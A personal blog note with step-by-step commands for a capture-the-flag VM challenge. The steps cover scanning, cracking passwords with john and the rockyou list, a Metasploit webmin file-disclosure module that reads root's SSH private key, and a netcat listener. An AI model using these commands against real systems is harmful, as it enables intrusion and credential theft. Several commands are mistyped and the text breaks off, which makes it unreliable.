Sunday, August 13, 2017

hack-d0not5top-vm-ctf-challenge

netdiscover

nmap -sV IP

visit the ip address

scan the webcontet using
dirb http://IP

check the folder - normally control, admin and check the
source code - FLAG number 1 founded = FL46_1

Binary code to converted into Decimal

netcat very verbrose
nc -vv IP

www.asciitohex.com - hexadecimal

brain fuck encoding
splitbrain.org/services/ook
obfuscation/encoding

add the code.ctf to the /etc/hosts as
IP and filename.ctf

dirb http://g4m35.ctf/H3x6L64m3/ /usr/share/wordlists/dirb/big.txt


cryptii.com/octal/text
interpret as octal convert to text
without the \

to access another terminal - use grep* and password the ctf name

exiftool - into an image and analyze the content.

john –wordlist=/usr/share/wordlists/rockyou.txt donotstop
john --wordlist=/usr/share/wordlists/rockyou.txt ignite

ssh username@IP

rbash shell
suedoh -l

surdoh /usr/bin/wmstrt


for i in {i..9999..1};do echo $(suedoh /usr/bin/wmstrt&);done

msf> use auxiliary/admin/webmin/file_disclosure

msf> auxiliary (file_disclosure) > set lhost 192.168.1.113

msf> auxiliary (file_disclosure) > set ssl true

msf> auxiliary (file_disclosure) > set rpath /root/.ssh/id_rsa

msf> auxiliary (file_disclosure) > exploit




ssh2john id_rsa> ignite
john --wordlist:/usr/share/wordlists/rockyou.txt ignite



nc -lp 1234 –vv





http://www.hackingarticles.in/hack-d0not5top-vm-ctf-challenge/

grep CTF

I used grep grep -i -r "string" /directory  -i to accept lowercase and uppercase  -r recursive __ look for all fol...